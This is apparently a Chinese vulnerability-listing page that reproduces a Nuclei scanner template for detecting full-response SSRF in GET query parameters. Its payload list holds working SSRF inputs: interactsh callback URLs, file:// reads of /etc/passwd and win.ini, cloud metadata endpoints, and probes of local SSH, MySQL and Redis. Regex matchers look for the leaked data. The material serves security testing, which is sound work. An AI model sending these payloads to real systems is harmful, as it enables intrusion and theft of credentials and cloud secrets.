response-ssrf: Full Response SSRF Detection

日期: 2025-08-01 | 影响软件: response-ssrf | POC: 已公开

漏洞描述

PoC代码[已公开]

id: response-ssrf

info:
  name: Full Response SSRF Detection
  author: pdteam,pwnhxl,j4vaovo,AmirHossein Raeisi
  severity: high
  reference:
    - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py
  metadata:
    max-request: 12
  tags: ssrf,dast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      ssrf:
        - 'http://{{interactsh-url}}'
        - 'http://{{FQDN}}.{{interactsh-url}}'
        - 'http://{{FQDN}}@{{interactsh-url}}'
        - 'http://{{interactsh-url}}#{{FQDN}}'
        - 'http://{{RDN}}.{{interactsh-url}}'
        - 'http://{{RDN}}@{{interactsh-url}}'
        - 'http://{{interactsh-url}}#{{RDN}}'
        - 'file:////./etc/./passwd'
        - 'file:///c:/./windows/./win.ini'
        - 'http://metadata.tencentyun.com/latest/meta-data/'
        - 'http://100.100.100.200/latest/meta-data/'
        - 'http://169.254.169.254/latest/meta-data/'
        - 'http://169.254.169.254/metadata/v1'
        - 'http://127.0.0.1:22'
        - 'http://127.0.0.1:3306'
        - 'dict://127.0.0.1:6379/info'

    fuzzing:
      - part: query
        mode: single
        keys:
          - callback
          - continue
          - data
          - dest
          - dir
          - domain
          - feed
          - file
          - host
          - html
          - imgurl
          - navigation
          - next
          - open
          - out
          - page
          - path
          - port
          - redirect
          - reference
          - return
          - show
          - site
          - to
          - uri
          - url
          - val
          - validate
          - view
          - window
        fuzz:
          - "{{ssrf}}"

      - part: query
        mode: single
        values:
          - "(https|http|file)(%3A%2F%2F|://)(.*?)"
        fuzz:
          - "{{ssrf}}"

    stop-at-first-match: true
    matchers-condition: or
    matchers:

      - type: word
        part: body
        words:
          - "Interactsh Server"

      - type: regex
        part: body
        regex:
          - 'SSH-(\d.\d)-OpenSSH_(\d.\d)'

      - type: regex
        part: body
        regex:
          - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)'

      - type: regex
        part: body
        regex:
          - '(\d.\d.\d)(.*?)mysql_native_password'

      - type: regex
        part: body
        regex:
          - 'root:.*?:[0-9]*:[0-9]*:'

      - type: word
        part: body
        words:
          - 'for 16-bit app support'

      - type: regex
        part: body
        regex:
          - 'dns-conf\/[\s\S]+instance\/'

      - type: regex
        part: body
        regex:
          - 'app-id[\s\S]+placement\/'

      - type: regex
        part: body
        regex:
          - 'ami-id[\s\S]+placement\/'

      - type: regex
        part: body
        regex:
          - 'id[\s\S]+interfaces\/'
# digest: 490a00463044022006af276ebf6a418b1bcf9f916236906c2eb958611639ee3f9e885872aedc5ee102201dd3a6cb133d0920b1e98ae20027fe57c348a763b189a5b38ba57edb242d09e4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐